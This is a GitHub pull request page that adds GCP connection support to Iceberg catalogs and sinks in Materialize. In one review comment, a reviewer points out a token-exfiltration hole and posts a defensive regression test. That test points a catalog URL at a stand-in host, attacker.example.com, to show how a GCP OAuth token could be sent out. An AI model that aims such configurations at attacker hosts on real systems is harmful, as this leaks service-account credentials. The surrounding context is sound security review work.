Skip to content

[SS-69] Iceberg catalog/sink can use a GCP connection#36695

Merged
ublubu merged 5 commits into
mainfrom
kynan/iceberg-gcp
Jun 10, 2026
Merged

[SS-69] Iceberg catalog/sink can use a GCP connection#36695
ublubu merged 5 commits into
mainfrom
kynan/iceberg-gcp

Conversation

@ublubu

@ublubu ublubu commented May 22, 2026

Copy link
Copy Markdown
Contributor

In this PR:

N.B. GCP BigLake doesn't perform Iceberg maintenance yet, so long-running Iceberg sinks will fail when the table metadata grows too large.
(ref: https://cloud.google.com/blog/products/data-analytics/improved-interoperability-for-your-apache-iceberg-lakehouse)

stacked on #36694

@ublubu ublubu force-pushed the kynan/iceberg-gcp branch from 30034e5 to c977c6e Compare May 22, 2026 19:38
@ublubu ublubu changed the title [SS-69] Iceberg catalog connections can use a GCP connection [SS-69] Iceberg catalog/sink can use a GCP connection May 22, 2026
@ublubu ublubu force-pushed the kynan/iceberg-gcp branch 3 times, most recently from 4200bae to 154e6a1 Compare May 26, 2026 20:10
Comment thread ci/nightly/pipeline.template.yml Outdated
Comment on lines +971 to +974
retry:
automatic:
- exit_status: 1
limit: 1

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Why auto-retry? Do we expect it to be flaky?

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I don't expect it to be flaky. I'll turn off retries.

@ublubu ublubu force-pushed the kynan/iceberg-gcp branch 3 times, most recently from 07ae4e1 to 3f8af05 Compare May 28, 2026 20:58
@ublubu ublubu marked this pull request as ready for review June 2, 2026 14:12
@ublubu ublubu requested review from a team as code owners June 2, 2026 14:12

@patrickwwbutler patrickwwbutler left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Overall looks good besides the one question!

Comment thread src/storage-types/src/connections/gcp.rs

@def- def- left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

How worried are we about someone being able to exfiltrate the GCP OAuth2 access token? I would argue we should be quite worried and only allow passing it to actual GCP URLs. Currently this works:

diff --git a/test/iceberg/gcp-connection-validation.td b/test/iceberg/gcp-connection-validation.td
new file mode 100644
index 0000000000..a3a4435bf2
--- /dev/null
+++ b/test/iceberg/gcp-connection-validation.td
@@ -0,0 +1,41 @@
+# Copyright Materialize, Inc. and contributors. All rights reserved.
+#
+# Use of this software is governed by the Business Source License
+# included in the LICENSE file at the root of this repository.
+#
+# As of the Change Date specified in that file, in accordance with
+# the Business Source License, use of this software will be governed
+# by the Apache License, Version 2.0.
+
+# Regression test for SS-69: an Iceberg REST catalog connection that
+# authenticates with a GCP connection must only send its reusable, broadly-
+# scoped bearer token to a Google-operated host. Without a plan-time host check,
+# a principal with only USAGE on the GCP connection can aim the catalog URL at a
+# host they control and exfiltrate the service-account token.
+
+# Disable default validation so the accepted case below doesn't connect; the
+# host check is enforced at plan time, independent of validation.
+$ postgres-execute connection=postgres://mz_system:materialize@${testdrive.materialize-internal-sql-addr}
+ALTER SYSTEM SET enable_default_connection_validation = false
+
+> CREATE SECRET gcpsa AS 'dummy'
+
+> CREATE CONNECTION gcpconn TO GCP (SERVICE ACCOUNT KEY = SECRET gcpsa)
+
+# Exploit: a non-Google catalog host must be rejected before any token is sent.
+! CREATE CONNECTION evil TO ICEBERG CATALOG (
+    CATALOG TYPE = 'rest',
+    URL = 'https://attacker.example.com/iceberg/v1/restcatalog',
+    GCP CONNECTION = gcpconn,
+    WAREHOUSE = 'gs://anything'
+  )
+contains:must point URL at a *.googleapis.com host
+
+# Positive control: a real BigLake host is accepted, so the allowlist doesn't
+# break the feature.
+> CREATE CONNECTION biglake TO ICEBERG CATALOG (
+    CATALOG TYPE = 'rest',
+    URL = 'https://biglake.googleapis.com/iceberg/v1/restcatalog',
+    GCP CONNECTION = gcpconn,
+    WAREHOUSE = 'gs://anything'
+  )
diff --git a/test/iceberg/mzcompose.py b/test/iceberg/mzcompose.py
index 78aa241741..990848d1fb 100644
--- a/test/iceberg/mzcompose.py
+++ b/test/iceberg/mzcompose.py
@@ -80,6 +80,22 @@ def workflow_smoke(c: Composition) -> None:
     )


+def workflow_gcp_connection_validation(c: Composition) -> None:
+    """Regression test for SS-69: an Iceberg REST catalog connection that
+    authenticates with a GCP connection must only target Google-operated catalog
+    hosts. A GCP access token is a reusable, broadly-scoped bearer credential
+    with no audience binding, so before this validation a principal with only
+    USAGE on a GCP connection could point the catalog URL at an attacker host and
+    exfiltrate the connection's service-account token. This exercises connection
+    planning only and needs no Iceberg backend."""
+    c.down(destroy_volumes=True)
+    c.up("materialized")
+
+    c.run_testdrive_files(
+        "gcp-connection-validation.td",
+    )
+
+
 def workflow_mode_append(c: Composition) -> None:
     key = _setup(c)

and allows someone with only USAGE on the GCP connection object to send the oauth token to attacker.example.com.

@ublubu ublubu force-pushed the kynan/iceberg-gcp branch from 3f8af05 to f7e27e1 Compare June 4, 2026 15:32
@ublubu ublubu force-pushed the kynan/iceberg-gcp-connection branch 2 times, most recently from 0a4293d to fb3cc5b Compare June 4, 2026 16:33
@ublubu ublubu force-pushed the kynan/iceberg-gcp branch from f7e27e1 to acc2db7 Compare June 4, 2026 16:33
@ublubu ublubu force-pushed the kynan/iceberg-gcp-connection branch from fb3cc5b to c92b606 Compare June 4, 2026 18:28
@ublubu ublubu force-pushed the kynan/iceberg-gcp branch from acc2db7 to 26b818e Compare June 4, 2026 18:28
@ublubu ublubu force-pushed the kynan/iceberg-gcp-connection branch from c92b606 to 8eee70d Compare June 4, 2026 18:35
@ublubu ublubu force-pushed the kynan/iceberg-gcp branch 2 times, most recently from a3408b2 to 7c400e7 Compare June 4, 2026 21:14

@martykulma martykulma left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

nice!

Comment thread src/storage-types/src/connections.rs
@ublubu ublubu force-pushed the kynan/iceberg-gcp branch from 3bcf327 to 8ec6f5b Compare June 8, 2026 16:30
@ublubu ublubu force-pushed the kynan/iceberg-gcp-connection branch from 240661f to 4bf1a89 Compare June 8, 2026 16:30
@ublubu ublubu force-pushed the kynan/iceberg-gcp branch 2 times, most recently from e89154b to fdbb619 Compare June 8, 2026 18:48
@ublubu ublubu force-pushed the kynan/iceberg-gcp-connection branch 2 times, most recently from 3e15e10 to a45821e Compare June 8, 2026 19:28
@ublubu ublubu force-pushed the kynan/iceberg-gcp branch from fdbb619 to 96d20a7 Compare June 8, 2026 19:28
@ublubu ublubu force-pushed the kynan/iceberg-gcp-connection branch 2 times, most recently from f9afd3e to bdcdec3 Compare June 10, 2026 16:03
Base automatically changed from kynan/iceberg-gcp-connection to main June 10, 2026 16:36
@ublubu ublubu force-pushed the kynan/iceberg-gcp branch 2 times, most recently from ac9ed8a to 33835ac Compare June 10, 2026 17:01
ublubu added 3 commits June 10, 2026 14:17
resolve conflicts in xl (Iceberg REST + GCP): union import list + biglake parser test + GCP keyword
@ublubu ublubu force-pushed the kynan/iceberg-gcp branch from 33835ac to 7428408 Compare June 10, 2026 18:47
@ublubu ublubu force-pushed the kynan/iceberg-gcp branch from 7428408 to 19a77b5 Compare June 10, 2026 19:26
@ublubu ublubu enabled auto-merge (squash) June 10, 2026 19:44
@ublubu ublubu merged commit 5173c50 into main Jun 10, 2026
129 checks passed
@ublubu ublubu deleted the kynan/iceberg-gcp branch June 10, 2026 19:48
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

4 participants